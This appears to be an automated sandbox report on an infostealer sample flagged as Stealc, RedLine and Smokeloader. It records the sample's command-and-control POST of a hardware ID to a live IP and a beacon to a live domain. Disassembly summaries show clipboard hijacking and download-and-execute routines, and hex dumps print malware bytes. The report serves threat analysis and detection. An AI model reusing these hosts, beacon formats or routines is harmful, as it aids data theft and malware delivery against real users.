Dec 11, 2024 06:57:02.574976921 CET	1236	IN	Data Raw: 5e 8b 4d 0c 8b 71 04 3b 71 08 75 3b be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3 ee f7 d6 21 b4 b8 c4 00 00 00 fe 4c 03 04 75 06 8b 4d 08 21 71 04 8b 4d 0c 8b 71 08 8b 49 04 89 4e Data Ascii: ^Mq;qu; s!tDLu!M!1K!LuM!qMqINMqINu]}u;MYN^qNqN;Nu`LML s%}uMDD)}uJMYJ
Dec 11, 2024 06:57:02.574990988 CET	896	IN	Data Raw: 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 00 75 0e 8b cf bb 00 00 00 80 d3 eb 8b 4d 08 09 19 8d 44 90 44 8b cf eb 20 80 7d 13 00 75 10 8d 4f e0 bb 00 00 00 80 d3 eb 8b 4d 08 09 59 04 8d 84 90 c4 00 00 00 Data Ascii: Y;YuWLML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M
Dec 11, 2024 06:57:02.575001955 CET	1236	IN	Data Raw: 88 44 fe 0f 75 33 8b 4d ec 8b 5d 08 21 0b eb 2c 8d 4f e0 d3 eb 8b 4d fc 8d 8c 88 c4 00 00 00 8d 7c 38 04 f7 d3 21 19 fe 0f 89 5d ec 75 0b 8b 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04 8b 4a 04 8b 7a 08 89 79 08 Data Ascii: Du3M]!,OM\|8!]u]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M\|D)}uN{MN7MtLMuN
Dec 11, 2024 06:57:02.575014114 CET	1236	IN	Data Raw: e8 5b f1 ff ff 59 c3 6a 08 e8 78 f0 ff ff 59 c3 8b ff 55 8b ec 56 8b f0 eb 0b 8b 06 85 c0 74 02 ff d0 83 c6 04 3b 75 08 72 f0 5e 5d c3 8b ff 55 8b ec 56 8b 75 08 33 c0 eb 0f 85 c0 75 10 8b 0e 85 c9 74 02 ff d1 83 c6 04 3b 75 0c 72 ec 5e 5d c3 8b Data Ascii: [YjxYUVt;ur^]UVu3ut;ur^]U=P$CthP$C/YtuP$CYU hChtCYYuBhQ>@lC$pCc=YthYtjjj3]jh&CvjwYe3C9
Dec 11, 2024 06:57:02.575025082 CET	1236	IN	Data Raw: ff 74 17 50 ff 35 6c 43 43 00 ff d6 ff d0 85 c0 74 08 8b 80 f8 01 00 00 eb 27 be ac 17 43 00 56 ff 15 2c 10 43 00 85 c0 75 0b 56 e8 5e fa ff ff 59 85 c0 74 18 68 9c 17 43 00 50 ff 15 4c 10 43 00 85 c0 74 08 ff 75 08 ff d0 89 45 08 8b 45 08 5e 5d Data Ascii: tP5lCCt'CV,CuV^YthCPLCtuEE^]jYUV5lCC5Ct!hCCtP5lCCt'CV,CuVYthCPLCtuEE^]CV5lCCCu5@oC
Dec 11, 2024 06:57:02.575253010 CET	1236	IN	Data Raw: a3 3c 6f 43 00 e8 03 fb ff ff ff 35 44 6f 43 00 a3 40 6f 43 00 e8 f3 fa ff ff ff 35 48 6f 43 00 a3 44 6f 43 00 e8 e3 fa ff ff 83 c4 10 a3 48 6f 43 00 e8 05 e6 ff ff 85 c0 74 65 68 3e 2e 40 00 ff 35 3c 6f 43 00 e8 3d fb ff ff 59 ff d0 a3 68 43 43 Data Ascii: <oC5DoC@oC5HoCDoCHoCteh>.@5<oC=YhCCtHhjYYt4V5hCC5DoCYtjVYYCN3@3_^UVW3u'Yu'9LoCvVC;LoCvu_^]U
Dec 11, 2024 06:57:02.575265884 CET	1236	IN	Data Raw: 8b 45 f4 83 60 70 fd 33 c0 5b 5f 5e c9 c3 8b ff 55 8b ec 33 c0 50 ff 75 10 ff 75 0c ff 75 08 39 05 a0 70 43 00 75 07 68 e0 44 43 00 eb 01 50 e8 ab fd ff ff 83 c4 14 5d c3 8b ff 55 8b ec 8b 45 08 8b 00 81 38 63 73 6d e0 75 2a 83 78 10 03 75 24 8b Data Ascii: E`p3[_^U3Puuu9pCuhDCP]UE8csmu*xu$@= t=!t="t=@u3]h]5@C3UQQVFV\\|CCW}S99tk;rk;s99u3tX]u3u`
Dec 11, 2024 06:57:02.695890903 CET	1236	IN	Data Raw: 75 05 e8 d9 1d 00 00 68 04 01 00 00 be 50 6f 43 00 56 53 88 1d 54 70 43 00 ff 15 f0 10 43 00 a1 d4 a0 80 00 89 35 0c 6c 43 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff Data Ascii: uhPoCVSTpCC5lC;tE8uuUEPSS}E=?sJMsB;r6PY;t)UEPWV}EHkC5kC3_^[UXpCSV5 CW33;u.;tXpC#CxujXXpCXpC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	92.255.57.89	80	7860	C:\Users\user\AppData\Local\Temp\1D71.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 06:57:06.076244116 CET	87	OUT	GET / HTTP/1.1 Host: 92.255.57.89 Connection: Keep-Alive Cache-Control: no-cache
Dec 11, 2024 06:57:07.405625105 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 05:57:07 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 11, 2024 06:57:07.408164978 CET	413	OUT	POST /45c616e921a794b8.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK Host: 92.255.57.89 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 43 44 42 32 37 43 41 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="hwid"B61CDB27CA5C3615030116------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="build"default------AKKKECBKKECGCAAAEHJK--
Dec 11, 2024 06:57:07.855370998 CET	210	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 05:57:07 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.179.207	443	7732	C:\Users\user\Desktop\SEejSLAS9f.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 05:57:00 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-11 05:57:00 UTC	804	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 05:57:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBDrpGNn7I6sU0AQGa52djSvssy2RT3yQT8Xm%2Bx2KdsMgXK775N6wK%2Bycvoj62PCaPdeKWzir4oUhiz%2BD4HmppfBCgl0NnyB43udF2%2FuYrM4dehVxC%2BRYugKnLuOSzdO3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f033c15bfd072a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1955&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=728&delivery_rate=1464393&cwnd=203&unsent_bytes=0&cid=4393b748273fa659&ts=653&x=0"
2024-12-11 05:57:00 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-11 05:57:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	00:56:54
Start date:	11/12/2024
Path:	C:\Users\user\Desktop\SEejSLAS9f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SEejSLAS9f.exe"
Imagebase:	0x400000
File size:	428'544 bytes
MD5 hash:	F538D845B52F9D902EE451636D79DF4D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	00:57:03
Start date:	11/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1D71.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1D71.tmp.exe"
Imagebase:	0x400000
File size:	304'128 bytes
MD5 hash:	9D773E345DCA0487C5654A92E6340BAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:57:33
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1296
Imagebase:	0xb20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	5.8%
Total number of Nodes:	737
Total number of Limit Nodes:	20

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

ShareScreen, xrefs: 00402A12
<, xrefs: 00402B45
.exe, xrefs: 00402A6B

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 008DE5C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008DE5EE
Module32First.KERNEL32(00000000,00000224), ref: 008DE60E

Memory Dump Source

Source File: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: c8413a37ce65fcee6a0b9a8cc0b2f7136a6545739d305614b4a686b9165c543b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 35F062312007146BD7203AF9A88DB6E77E8FF69765F10062AF642D55C0DA70E8458A61

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0247024D

Strings

kernel32.dll, xrefs: 0247008F, 02470095
cess, xrefs: 0247018D

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
ShareScreen, xrefs: 00402C22
&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
